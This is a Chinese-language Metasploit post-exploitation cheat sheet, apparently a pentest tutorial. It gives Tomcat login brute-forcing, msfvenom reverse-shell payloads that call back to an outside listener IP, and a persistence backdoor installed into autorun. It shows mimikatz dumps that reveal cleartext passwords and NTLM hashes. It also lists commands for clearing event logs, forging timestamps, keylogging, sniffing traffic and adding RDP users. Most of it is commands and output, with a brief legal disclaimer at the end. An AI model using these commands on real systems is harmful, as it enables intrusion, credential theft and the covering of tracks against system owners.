Metasploit渗透使用攻略
msf关于tomcat口令暴力猜解模块
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run
- 注意:tomcat默认每个账号登陆5次失败后,账户就会被锁定
msf建立windows反弹shell
1.生成windows反弹shell
msfconsle
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件
2.获取监听IP与端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run
3.反弹成功
meterpreter > sysinfo
Computer : WIN-UKKED2CCSHJ
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\padt002
msf建立linux反弹shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST为公网IP
//LPORT为反弹端口
//4433.exe为生成文件
msf建立persistence持久化
Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。
我们运行persistence脚本让系统开机自启动,启动命令为
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Meterpreter(-X),10秒(-i 10) 重连一次,使用端口为6666(-p 6666),连接的目的IP为 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.71.112 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 WUST-3E75F1D708\Administrator @ WUST-3E75F1D708 192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
自动化的脚本在C:\Documents and Settings\Administrator\Local Settings\Temp\下
自动化以后下次可以直接在msf下打开会话:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
mimikatz抓取密码
mimikatz-获取密码1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
0;49101 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
mimikatz-获取密码2
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93
Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Rid : 501
User : Guest
LM :
NTLM :
Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
mimikatz-wdigest
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
mimikatz-tspkg
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
meterpreter基本命令
系统命令-基本系统命令
sessions
//sessions –h 查看帮助
sessions -l
//列出当前会话
sessions -i <ID值>
//进入会话
sessions -k
//杀死会话
background
//将当前会话放置后台
run
//执行已有的模块,输入run后按两下tab,列出已有的脚本
info
//查看已有模块信息
getuid
//查看权限
getpid
//获取当前进程的pid
sysinfo
//查看目标机系统信息
ps
//查看当前活跃进程
kill <PID值>
//杀死进程
idletime
//查看目标机闲置时间
reboot
shutdown
//重启/关机
shell
//进入目标机cmd shell
系统命令-execute执行文件
execute
//在目标机中执行文件
execute -H -i -f cmd.exe
//创建新进程cmd.exe,-H不可见,-i交互
系统命令-clearev清除日志
clearev #清除windows中的应用程序日志、系统日志、安全日志
文件系统命令-基本文件系统命令
getwd
pwd
//查看当前工作目录
ls
//列出当前目录
cd
//跳转目录
search -f *pass*
//搜索文件 -h查看帮助
cat c:\\lltest\\lltestpasswd.txt
//查看文件内容
upload /tmp/hack.txt C:\\lltest
//上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/
//下载文件到本机上
edit c:\\1.txt
//编辑或创建文件,没有的话,会新建文件
rm C:\\lltest\\hack.txt
//删除文件
mkdir lltest2
//只能在当前目录下创建文件夹
rmdir lltest2
//只能删除当前目录下文件夹
getlwd
lpwd
//操作攻击者主机 查看当前目录
lcd /tmp
//操作攻击者主机 切换目录
文件系统命令-timestomp伪造时间戳
timestomp C:// -h
//查看帮助
timestomp -v C://2.txt
//查看时间戳
timestomp C://2.txt -f C://1.txt
//将1.txt的时间戳复制给2.txt
网络命令-基本网络命令
ipconfig/ifconfig
netstat –ano
arp
getproxy
//查看代理信息
route
//查看路由
网络命令-portfwd端口转发
portfwd add -l 6666 -p 3389 -r 127.0.0.1
//将目标机的3389端口转发到本地6666端口
网络命令-端口扫描
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
提权
getsystem
getsystem工作原理:
①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
③Windows服务已启动,导致与命名管道建立连接。
④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。
远程桌面&截屏
enumdesktops
//查看可用的桌面
getdesktop
//获取当前meterpreter 关联的桌面
set_desktop
//设置meterpreter关联的桌面 -h查看帮助
screenshot
//截屏
use espia
//或者使用espia模块截屏 然后输入screengrab
run vnc
//使用vnc远程桌面连接
远程桌面-getgui命令
run getgui –h
//查看帮助
run getgui -e
//开启远程桌面
run getgui -u lltest2 -p 123456
//添加用户
run getgui -f 6661 –e
//389端口转发到6661
getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆
远程桌面-enable_rdp脚本
run post/windows/manage/enable_rdp
//开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//将3389端口转发到6662
脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令
键盘记录
keyscan_start
//开始键盘记录
keyscan_dump
//导出记录数据
keyscan_stop
//结束键盘记录
sniffer抓包
use sniffer
sniffer_interfaces
//查看网卡
sniffer_start 2
//选择网卡 开始抓包
sniffer_stats 2
//查看状态
sniffer_dump 2 /tmp/lltest.pcap
//导出pcap数据包
sniffer_stop 2
//停止抓包
哈希利用-获取哈希
run post/windows/gather/smart_hashdump
//从SAM导出密码哈希,需要SYSTEM权限
参考链接
csdn-利用Metasploit获取linux反弹shell的尝试
csdn-MSF生成windows木马
后渗透之meterpreter使用攻略
kali meterpreter中mimikatz模块获取密码
声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!